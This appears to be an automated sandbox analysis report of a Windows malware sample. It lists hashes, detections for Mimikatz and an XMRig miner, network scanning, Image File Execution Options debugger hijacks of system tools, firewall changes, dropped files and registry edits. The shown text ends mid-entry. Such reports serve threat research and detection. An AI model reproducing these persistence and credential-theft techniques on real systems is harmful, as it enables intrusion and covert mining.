Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23-07-2024 08:50
Behavioral task
behavioral1
Sample
92c1974ed4c1b8186bb4845ced9de1f0N.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
92c1974ed4c1b8186bb4845ced9de1f0N.exe
Resource
win10v2004-20240709-en
General
-
Target
92c1974ed4c1b8186bb4845ced9de1f0N.exe
-
Size
8.0MB
-
MD5
92c1974ed4c1b8186bb4845ced9de1f0
-
SHA1
7fb472fdccd0fc1d1bf328b076ebedb874a33b96
-
SHA256
3974d6b6883828af67ebff025050aabaece8ae7fef8b8d1fbe4fe47e23cd811c
-
SHA512
06c3d5db37e0a5f8a3f7e3cf52c80b96ef48fc27ead68824dbdd0afd6b786ebdff28eac3cc9f30adab01e173e3e18db966252f299e66d16965f4d95d7c23468a
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2040 created 2128 2040 qfabize.exe 38 -
Contacts a large (14185) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/3732-182-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-194-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-200-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-212-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-221-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-230-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-248-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-250-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig behavioral2/memory/3732-251-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/5076-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/5076-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x0007000000023440-6.dat mimikatz behavioral2/memory/3128-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4008-138-0x00007FF7F58A0000-0x00007FF7F598E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts qfabize.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts qfabize.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe qfabize.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1344 netsh.exe 2080 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 3128 qfabize.exe 2040 qfabize.exe 988 wpcap.exe 3356 wrncrrpzd.exe 4008 vfshost.exe 3512 yzzreckrz.exe 380 xohudmc.exe 2724 nslfoo.exe 3732 kfcalc.exe 3432 yzzreckrz.exe 1992 yzzreckrz.exe 4812 yzzreckrz.exe 4468 yzzreckrz.exe 3044 yzzreckrz.exe 1136 yzzreckrz.exe 1660 yzzreckrz.exe 1916 yzzreckrz.exe 1000 yzzreckrz.exe 3704 yzzreckrz.exe 372 yzzreckrz.exe 4648 yzzreckrz.exe 4100 yzzreckrz.exe 4844 yzzreckrz.exe 3300 yzzreckrz.exe 3972 yzzreckrz.exe 4892 qfabize.exe 2796 yzzreckrz.exe 3704 gabnkczie.exe -
Loads dropped DLL 12 IoCs
pid Process 988 wpcap.exe 988 wpcap.exe 988 wpcap.exe 988 wpcap.exe 988 wpcap.exe 988 wpcap.exe 988 wpcap.exe 988 wpcap.exe 988 wpcap.exe 3356 wrncrrpzd.exe 3356 wrncrrpzd.exe 3356 wrncrrpzd.exe -
resource yara_rule behavioral2/files/0x000700000002348e-134.dat upx behavioral2/memory/4008-135-0x00007FF7F58A0000-0x00007FF7F598E000-memory.dmp upx behavioral2/memory/4008-138-0x00007FF7F58A0000-0x00007FF7F598E000-memory.dmp upx behavioral2/files/0x0007000000023499-141.dat upx behavioral2/memory/3512-142-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3512-146-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/files/0x0007000000023496-163.dat upx behavioral2/memory/3732-164-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/3432-171-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/1992-175-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/4812-179-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3732-182-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/4468-184-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3044-188-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/1136-192-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3732-194-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/1660-197-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3732-200-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/1916-202-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/1000-206-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3704-210-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3732-212-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/372-215-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/4648-219-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3732-221-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/4100-224-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/4844-228-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3732-230-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/3300-232-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3972-234-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/2796-238-0x00007FF7A7250000-0x00007FF7A72AB000-memory.dmp upx behavioral2/memory/3732-248-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/3732-250-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx behavioral2/memory/3732-251-0x00007FF66C3B0000-0x00007FF66C4D0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 ifconfig.me 78 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content qfabize.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2DEAA270F2A3ADDABB8505E3C5BD28E8 qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 qfabize.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 qfabize.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2DEAA270F2A3ADDABB8505E3C5BD28E8 qfabize.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 59 IoCs
description ioc Process File created C:\Windows\crwkenged\UnattendGC\specials\schoedcl.xml qfabize.exe File opened for modification C:\Windows\mzqrhbdf\vimpcsvc.xml qfabize.exe File opened for modification C:\Windows\crwkenged\Corporate\log.txt cmd.exe File created C:\Windows\crwkenged\qecbgmeqc\ip.txt qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\exma-1.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\libxml2.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\ucl.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\spoolsrv.exe qfabize.exe File created C:\Windows\crwkenged\UnattendGC\AppCapture64.dll qfabize.exe File created C:\Windows\crwkenged\qecbgmeqc\gabnkczie.exe qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\trch-1.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\vimpcsvc.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\docmicfg.xml qfabize.exe File created C:\Windows\crwkenged\qecbgmeqc\wpcap.exe qfabize.exe File created C:\Windows\mzqrhbdf\schoedcl.xml qfabize.exe File created C:\Windows\crwkenged\Corporate\vfshost.exe qfabize.exe File created C:\Windows\mzqrhbdf\docmicfg.xml qfabize.exe File opened for modification C:\Windows\mzqrhbdf\schoedcl.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\AppCapture32.dll qfabize.exe File created C:\Windows\crwkenged\qecbgmeqc\Packet.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\crli-0.dll qfabize.exe File created C:\Windows\crwkenged\Corporate\mimidrv.sys qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\posh-0.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\spoolsrv.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\schoedcl.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\spoolsrv.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\vimpcsvc.exe qfabize.exe File opened for modification C:\Windows\mzqrhbdf\svschost.xml qfabize.exe File opened for modification C:\Windows\mzqrhbdf\docmicfg.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\coli-0.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\ssleay32.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\trfo-2.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\tucl-1.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\cnli-1.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\Shellcode.ini qfabize.exe File created C:\Windows\crwkenged\upbdrjv\swrpwe.exe qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\zlib1.dll qfabize.exe File opened for modification C:\Windows\mzqrhbdf\spoolsrv.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\xdvl-0.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\svschost.exe qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\docmicfg.exe qfabize.exe File created C:\Windows\ime\qfabize.exe qfabize.exe File created C:\Windows\mzqrhbdf\qfabize.exe 92c1974ed4c1b8186bb4845ced9de1f0N.exe File opened for modification C:\Windows\mzqrhbdf\qfabize.exe 92c1974ed4c1b8186bb4845ced9de1f0N.exe File created C:\Windows\crwkenged\qecbgmeqc\wrncrrpzd.exe qfabize.exe File created C:\Windows\crwkenged\qecbgmeqc\wpcap.dll qfabize.exe File opened for modification C:\Windows\crwkenged\qecbgmeqc\Packet.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\schoedcl.exe qfabize.exe File created C:\Windows\mzqrhbdf\spoolsrv.xml qfabize.exe File created C:\Windows\crwkenged\qecbgmeqc\scan.bat qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\libeay32.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\svschost.xml qfabize.exe File created C:\Windows\mzqrhbdf\vimpcsvc.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\tibe-2.dll qfabize.exe File created C:\Windows\crwkenged\UnattendGC\docmicfg.xml qfabize.exe File created C:\Windows\mzqrhbdf\svschost.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\svschost.xml qfabize.exe File created C:\Windows\crwkenged\UnattendGC\specials\vimpcsvc.xml qfabize.exe File created C:\Windows\crwkenged\Corporate\mimilib.dll qfabize.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2204 sc.exe 4220 sc.exe 4844 sc.exe 4544 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023440-6.dat nsis_installer_2 behavioral2/files/0x0011000000023452-15.dat nsis_installer_1 behavioral2/files/0x0011000000023452-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" qfabize.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ qfabize.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing qfabize.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created 